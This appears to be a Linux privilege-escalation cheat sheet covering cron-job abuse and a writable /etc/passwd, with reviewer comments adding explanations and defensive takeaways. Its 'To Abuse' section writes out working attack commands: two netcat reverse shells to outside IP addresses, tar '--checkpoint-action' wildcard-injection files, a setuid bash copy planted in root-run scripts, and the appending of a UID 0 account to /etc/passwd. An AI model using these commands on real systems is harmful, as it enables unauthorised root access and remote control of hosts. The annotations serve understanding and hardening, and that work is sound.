Insecure File Permissions

Abusing Cron Jobs

To check

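# Audit cron configuration: list the cron directories and files under /etc
# with owner and mode, so entries writable by non-root users stand out.
ls -lah /etc/cron*

# Show the crontab of the current user.
crontab -l

# Show the system-wide crontab (path fixed: was misspelled "corntab").
cat /etc/crontab

# Pull cron activity out of syslog to see which jobs actually run and when.
grep "CRON" /var/log/syslog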

Also check other log files for cron activity; not every system writes it to /var/log/syslog.

To Abuse

# Option-injection through file names in a directory handled by a scheduled job.
# NOTE(review): the targeted cron entry is not shown on this page. The two file
# names below match GNU tar's --checkpoint / --checkpoint-action options, so this
# presumably depends on a privileged job running tar with an unquoted `*` in
# /var/www/html: the shell expands `*` to these names and tar reads them as options.
# Defensive takeaway: in scheduled jobs pass paths as `./*` (or put `--` before
# the file list) so a file name can never be parsed as an option, keep such
# directories non-writable for unprivileged users, and alert on files whose
# names begin with "--".
cd /var/www/html
# Writes shell.sh: a FIFO-backed interactive bash piped through nc to
# 10.8.3.38:4443 (outbound connection; leaves /tmp/f behind as an artifact).
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.3.38 4443 >/tmp/f" > shell.sh
# Empty files whose names are the injected options.
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

# Read the system-wide crontab to see which scripts run and as which user.
cat /etc/crontab
# Replaces the content of /home/user/overwrite.sh with a command that copies
# bash to /tmp/bash and sets the setuid/setgid bits on the copy.
# NOTE(review): presumably overwrite.sh is run by a root cron entry while being
# writable by the user; the crontab content is not shown here.
# Defensive takeaway: scripts executed by root cron jobs must be root-owned and
# not writable by others, in directories with the same property; mounting /tmp
# nosuid and sweeping for setuid files outside system paths catches the result.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

# Same payload written to runme.sh, then triggered through file names that look
# like GNU tar options (--checkpoint / --checkpoint-action).
# NOTE(review): presumably relies on a privileged job running tar with an
# unquoted `*` inside /home/user; confirm against the actual cron entry.
# Mitigation in the job itself: use `./*` or a `--` separator before the file list.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh


# Wildcard (option) injection, written relative to the current directory.
# NOTE(review): the file names match GNU tar's --checkpoint options, so this
# presumably assumes a scheduled `tar ... *` run in this directory; the job is
# not shown on the page.
# Defensive takeaway: never hand an unquoted `*` to a command in a directory
# that less-privileged users can write to; use `./*` or a `--` separator, and
# flag files whose names start with "--".
# Writes shell.sh: /bin/sh wired through the FIFO /tmp/lhennp to nc connecting
# out to 10.17.10.67:8888.
echo "mkfifo /tmp/lhennp; nc 10.17.10.67 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
# Creates the two option-named files (each holds only a newline).
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Writable /etc/passwd

# Only works when /etc/passwd is writable by the current user, which is a
# misconfiguration: the file is normally writable by root alone.
# Defensive takeaway: verify owner and mode of /etc/passwd, watch the file for
# modification, and alert on any account other than root that has UID 0.

# Prints a password hash for the password "getsystem".
openssl passwd getsystem

# Appends an account named "getsystem" with UID 0 / GID 0 and a password hash
# stored directly in the passwd field.
echo "getsystem:n0ziXTZ5ZZOn6:0:0:root:/root:/bin/bash" >> /etc/passwd

# Switch to the new account.
su getsystem

# NOTE(review): the next line looks like the password typed at su's prompt,
# not a command to run.
getsystem

# Confirm the resulting identity.
id
